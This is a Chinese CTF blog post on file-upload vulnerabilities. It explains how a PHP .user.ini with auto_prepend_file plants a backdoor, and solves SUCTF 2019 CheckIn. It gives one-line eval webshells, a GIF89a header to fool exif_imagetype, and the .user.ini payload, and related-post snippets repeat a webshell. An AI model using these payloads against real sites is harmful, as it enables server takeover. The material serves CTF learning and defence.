【文件上传漏洞】user.ini留后门

最新推荐文章于 2024-06-18 15:47:22 发布
最新推荐文章于 2024-06-18 15:47:22 发布
阅读量4.2k 收藏 17
点赞数 6
分类专栏: CTF-web 文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53146913/article/details/124840296
版权

一、什么是.user.ini?

php.ini是php默认的配置文件。其中包含四种配置,

在PHP_INI_USER的配置项中,提到.user.ini。

这里作用解释如下:

除了主 php.ini 之外,PHP 还会在每个目录下扫描 INI 文件,从被执行的 PHP 文件所在目录开始一直上升到 web 根目录($_SERVER['DOCUMENT_ROOT'] 所指定的)。如果被执行的 PHP 文件在 web 根目录之外,则只扫描该目录。

.user.ini 是PHP 支持基于每个目录的 INI 文件配置。如果你的 PHP 以模块化运行在 Apache 里,则用 .htaccess 文件有同样效果。

这里就很清楚了,.user.ini实际上就是一个可以由用户“自定义”的php.ini,我们能够自定义的设置是模式为“PHP_INI_PERDIR 、 PHP_INI_USER”的设置。(上面表格中没有提到的PHP_INI_PERDIR也可以在.user.ini中设置) 

而且,和php.ini不同的是,.user.ini是一个能被动态加载的ini文件。也就是说我修改了.user.ini后,不需要重启服务器中间件,只需要等待user_ini.cache_ttl所设置的时间(默认为300秒),即可被重新加载。

这里的意思就是说我们在.user.ini中设置php.ini中PHP_INI_PERDIRPHP_INI_USER 模式的 INI 设置,只要是使用CGI/FastCGI模式的服务器都可以使用.user.ini

然后我们看到php.ini中的配置项,可惜我沮丧地发现,只要稍微敏感的配置项,都是PHP_INI_SYSTEM模式的(甚至是php.ini only的),包括disable_functionsextension_direnable_dl等。 不过,我们可以很容易地借助.user.ini文件来构造一个“后门”。

二、auto_prepend_fileauto_append_file

Php配置项中有两个比较有意思的项(下图第一、四个):

auto_append_fileauto_prepend_file,点开看看什么意思:

指定一个文件,自动包含在要执行的文件前,类似于在文件前调用了require()函数。而auto_append_file类似,只是在文件后面包含。 使用方法很简单,直接写在.user.ini中:

auto_prepend_file=11.gif

11.gif是要包含的文件。

auto_prepend_file 在文顶部插入加载文件;

auto_append_file 在文件最后插入加载文件(当文件调用的有exit()时该设置无效)

所以,我们可以借助.user.ini轻松让所有php文件都“自动”包含某个文件,而这个文件可以是一个正常php文件,也可以是一个包含一句话的webshell。

三、例题

【SUCTF 2019】 CheckIn

<?php

if (isset($_POST["upload"])) {
    $tmp_name = $_FILES["fileUpload"]["tmp_name"];
    $name = $_FILES["fileUpload"]["name"];
    if (!$tmp_name) {
        die("filesize too big!");
    }
    if (!$name) {
        die("filename cannot be empty!");
    }
    
/?文件后缀名过滤

    if (preg_match("/ph|htacess/i", $extension)) {
        die("illegal suffix!");
    }

/?php内容格式过滤
    if (mb_strpos(file_get_contents($tmp_name), "<?") !== FALSE) {
        die("&lt;? in contents!");
    }

/?文件属性是否为2图像过滤
    $image_type = exif_imagetype($tmp_name);
    if (!$image_type) {
        die("exif_imagetype:not image!");
    }

绕过内容过滤

绕过" <? ",用了 <script language="php">eval($_POST['a']);</script> ,但本质上还是 PHP 一句话木马,因为执行函数还是 PHP的 eval()

绕过文件检测

  • 用的是 exif_imagetype() 函数检测文件类型。
  • 简单的说,这个函数是通过检测你上传的文件名的文件头来确定文件类型。文件头通常在文件开头几个字节,相当于一个标识符。
  • 所以我们只要在文件开头加上图片的文件头,就会会认为是图片文件。

绕过后缀名过滤!!!user.ini

        最简单的方式就是先上传一个后缀名为 GIF的 PHP 文件,再抓包加上文件头文本 GIF89a ,或者把文件用winhex或其它工具十六进制打开,在文件头加上相应的十六进制数。当然也可以用 png 或 jpg 形式的图片马

        成功传入图片马后,再上传 包含auto_prepend_file配置选项的.user.ini文件,让它去包含我们上传的图片马。

.user.int

GIF89a
auto_prepend_file=evil.gif

 成功传入.user.ini 同时,知道了存在被执行的index.php 文件,同时知道了文件路径,所以用蚁剑来连接。或者使用GET请求。

 

 

 

菜菜zhao
关注
  • 6
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
phpcmsv9.0任意文件上传漏洞解析
01-19
漏洞存在地址: burp抓包 POST /phpcms_v9.6.0_UTF8/install_package/index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1 Host: 192.168.0.109 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/
MySQL 5.6 & 5.7最优配置文件模板(my.ini)
02-18
整理了一份最新基于MySQL 5.6和5.7的配置文件模板,基本上可以说覆盖90%的调优选项,用户只需根据自己的服务器配置稍作修改即可,如InnoDB缓冲池的大小、IO能力(innodb_buffer_pool_size,innodb_io_capacity)。...
文件上传-.user.ini的妙用
A_991128a的博客
04-14 670
小伙伴们大家好!本期为大家带来的是在文件上传漏洞中的妙用。.user.ini.user.ini的妙用原理利用.user.ini的环境实战演示​1、先尝试直接上传webshell2、看是否能够上传除php和png外的文件3、上传.user.ini文件4、再次尝试上传webshell5、测试上传的.user.ini与webshell是否能够正常生效6、使用连接工具连接webshell。
文件上传绕过2——.uaer.ini+二次渲染
xiaoheizi的博客
06-29 218
user.ini就是一个可以由用户”自定义“的php.ini,我们能够自定义的设置是模式为“PHP_INI_PERDIR 、 PHP_INI_USER”的设置。新建一个文件名为.user.ini的文件,并将内容写为:auto_prepend_file=1.jpg,将.user.ini上传至服务器。gif可以直接在图片插入图片马,jpg png不建议直接在图片插入脚本代码,可以在网上找图片马生成脚本运行。想要.user.ini文件生效需要一个索引,就是说需要在上传文件的存储路径下有个.php可执行文件。
文件上传漏洞中的.user.ini文件
weixin_65279640的博客
04-18 859
因此,正确配置 PHP 和服务器权限,以及限制对上传目录的访问,是非常重要的。文件允许用户为特定目录定义 PHP 配置指令,这些配置指令将在该目录及其所有子目录中的 PHP 脚本执行时生效。这样,不同的应用程序或用户可以在自己的目录中设置特定的 PHP 配置,而不影响整个服务器的配置。文件是 PHP 中用于配置特定目录的设置的特殊文件。如果服务器上的 PHP 没有正确配置,那么每当有 PHP 文件在这个目录下被访问时,文件到 PHP 服务器上,他们可能会利用这个文件来改变服务器的配置,例如修改。
.user.ini配置文件
m0_52051132的博客
12-10 1103
user.ini。它比.htaccess 用的更广,不管服务器是 nginx/apache/IIS,当使用 CGI/.user.ini 文件作用:所有的 php 文件都自动包含 test.jpg 文件。.user.ini 相当于一个用。类似于 apache 的.htaccess,但语法与.htacces 不同,语法跟 php.ini 一致。FastCGI 来解析 php 时,php 会优先搜索目录下所有的.ini 文件,并应用其中的配置。再上传一个内容为 php 一句话脚本,命名为 test.jpg。
php user.ini详解
HAI_WD的博客
08-25 1754
本篇主要是讲解分析一下user.ini相关的内容。因为这个知识点涉及到文件上传的绕过。
.user.ini 作用和配置
热门推荐
冰恋云的专栏
04-08 1万+
.htaccess是伪静态环境配置文件,用于lamp。 .user.ini是lnmp文件,里面放的是你网站的文件夹路径地址。目的是防止跨目录访问和文件跨目录读取. 配置 放在根目录 .user.ini open_basedir=/项目路径/:/tmp/:/proc/ 例:open_basedir=/www/aaa/:/tmp/:/proc/ 测试: 没...
[文件上传]浅析.user.ini的利用
cosmoslin的博客
10-16 6722
.user.ini php.iniphp的一个全局配置文件,对整个web服务起作用;而.user.ini和.htaccess一样是目录的配置文件,.user.ini就是用户自定义的一个php.ini,我们可以利用这个文件来构造后门和隐藏后门。 实例 php 配置项中有两个配置可以起到一些作用 auto_prepend_file = <filename> //包含在文件头 auto_append_file = <filename> //包含在文件尾
利用.user.ini构建php后门
good good study
01-27 4763
服务器以fastcgi启动运行的时候,.user.ini也是php的一种配置文件,众所周知php.iniphp的配置文件,它可以做到显示报错,导入扩展,文件解析,web站点路径等等设置。但是如果想要把某个文件里面的配置与全局的php.ini不同,则可以在php文件中加上ini_set()来配置特定的配置变量。
C# 读/写.ini配置文件的通用操作类,参数可以分组,具体看描述
06-24
var unitId = OperateIniFile.ReadIniData("Unit", "UnitId", "ini中没有值时,赋默认值xxx", "ShareInfo.ini路径xx"); 2、写 OperateIniFile.WriteIniData("Unit", "UnitId", "076a0a4d-c417-4fee-902f-245e...
php.ini文件配置好后,zend路径也全部配置正确,但是phpinfo()还显示没有zend信息
09-30
php.ini文件配置好后,zend路径也全部配置正确,但是phpinfo()还显示没有zend信息,查看zend的目录是否有user权限。默认即可。
upload靶场第五关 超详细两种绕过方法(含.ini绕过)
2301_79650865的博客
02-02 1114
upload靶场第五关 两种超详细绕过方式!包含.user.ini绕过方法及知识点
.user.ini 无法修改/删除 怎么办?
weixin_42957379的博客
01-19 1万+
首先 了解chattr命令: Linux chattr命令用于改变文件属性。 这项指令可改变存放在ext2文件系统上的文件或目录属性,这些属性共有以下8种模式: a:让文件或目录仅供附加用途。 b:不更新文件或目录的最后存取时间。 c:将文件或目录压缩后存放。 d:将文件或目录排除在倾倒操作之外。 i:不得任意更动文件或目录。 s:保密性删除文件或目录。 S:即时更新文件或目录...
.htaccess和.user.ini
nigo134的博客
07-23 974
.htaccess是什么 .htaccess文件(或者"分布式配置文件")提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。 概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定
文件上传漏洞总结
qq_51582652的博客
03-22 432
文件上传漏洞总结前端验证头部验证MIME验证黑名单验证Phtml绕过Htaccess绕过大小写绕过双写绕过特殊字符绕过构造后缀名绕过白名单验证0x00截断(1)[^1]0x00截断(2)图片马[^2]二次渲染条件竞争Waf检测Waf头部绕过Waf内容绕过总结 前端验证 可以利用开发者工具删除掉与脚本的事件。然后在上传恶意的代码。 一句话木马内容 <?php @eval($_POST['123']);?> 上传一句话木马之后利用菜刀进行连接 头部验证 MIME验证 概述:MIME验证:使客户
k8s解决java服务下载超时问题
最新发布
云深海阔专栏
06-18 252
我们在走ingress的java程序的时候,往往会有导出数据的功能,这个时候就会有因网络慢、后台处理时间过长导致下载超时,也有因下载文件太大,导致下载失败,综合解决办法如下。1)更改反向代理超时时间。
文件上传.user.ini使用
09-10
### 回答1: `user.ini` 是一个 PHP 配置文件,用于自定义 PHP 环境的设置。它可以用来覆盖 php.ini 中的设置。在使用文件上传时,你可以使用 `user.ini` 文件来设置上传文件大小限制等参数。 以下是在 `user.ini` 中设置文件上传大小限制的示例: ``` upload_max_filesize = 20M post_max_size = 20M ``` 这会将上传文件的最大大小限制设置为 20MB。请注意,`upload_max_filesize` 和 `post_max_size` 必须设置为相同的值,以确保文件上传正常工作。 你需要将 `user.ini` 文件放置在需要自定义 PHP 环境的目录中。例如,如果你希望更改在 `/var/www/html` 目录中运行的应用程序的 PHP 环境设置,则可以将 `user.ini` 文件放置在 `/var/www/html` 目录中。 请注意,如果使用的是共享主机,你的主机可能不允许使用 `user.ini` 文件来自定义 PHP 环境设置。在这种情况下,请联系你的主机提供商以获取更多信息。 ### 回答2: 文件上传在Web开发中非常常见,用户可以通过网页将自己的文件上传到服务器上。然而,有时我们需要对上传的文件进行一些限制和配置,这就可以通过使用"user.ini"文件来实现。 "user.ini"是一个用于配置PHPini文件,它可以用来限制文件上传的大小、类型等。它的用法非常简单,只需要在PHP代码的同一目录中创建一个名为"user.ini"的文件即可。 在"user.ini"文件中,我们可以使用几个指令来配置文件上传的规则。例如,可以使用"upload_max_filesize"指令来限制上传文件的最大大小;使用"max_file_uploads"指令来限制一次上传的最大文件数量;使用"post_max_size"指令来限制POST请求的最大数据量。 通过修改这些指令的值,我们可以根据实际需求来控制文件上传的限制。例如,可以将"upload_max_filesize"设置为"2M",表示最大上传文件大小为2MB;将"max_file_uploads"设置为"5",表示一次最多上传5个文件。 另外,还可以使用"file_uploads"指令来开启或禁用文件上传功能。将其设置为"Off"可以禁用文件上传,而将其设置为"On"则可以启用文件上传。 总之,使用"user.ini"文件可以对文件上传进行一些基本的配置和限制。通过修改这个文件中的指令值,我们可以灵活地控制文件上传的行为,从而更好地满足我们的需求。 ### 回答3: 文件上传.user.ini 是一个 PHP 配置文件,用于配置 PHP 在上传文件时的一些相关设置。它是用于限制或允许上传文件的大小、类型以及其他相关的安全设置。 在使用文件上传.user.ini 之前,首先要确保你的服务器支持 PHP,并且你有合适的权限来编辑服务器上的 PHP 配置文件。 文件上传.user.ini 的使用分为三个步骤: 1. 打开文件上传.user.ini:通过一个文本编辑器,可以打开这个文件进行编辑。请注意,如果不存在该文件,你可以创建一个新文件,并将其命名为文件上传.user.ini。 2. 设置文件上传的配置:在文件上传.user.ini 中,你可以设置一些上传文件的相关参数。例如,你可以设置最大允许上传的文件大小、允许上传的文件类型等。这些配置将会影响到你的 PHP 程序在上传文件时的行为。 3. 保存配置文件:在你完成配置后,记得保存文件上传.user.ini 文件。然后将它放置在你的 Web 服务器的根目录下,以确保 PHP 程序能读取到这个配置文件。 需要注意的是,文件上传.user.ini 文件的配置只会对当前目录以及其子目录下的 PHP 程序起作用。这意味着你可以在不同的目录下使用不同的文件上传配置。 总而言之,文件上传.user.ini 可以方便地配置 PHP文件上传时的一些限制和安全设置。通过合理对其进行配置,可以提高服务器的安全性,并防止恶意用户上传不安全的文件。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值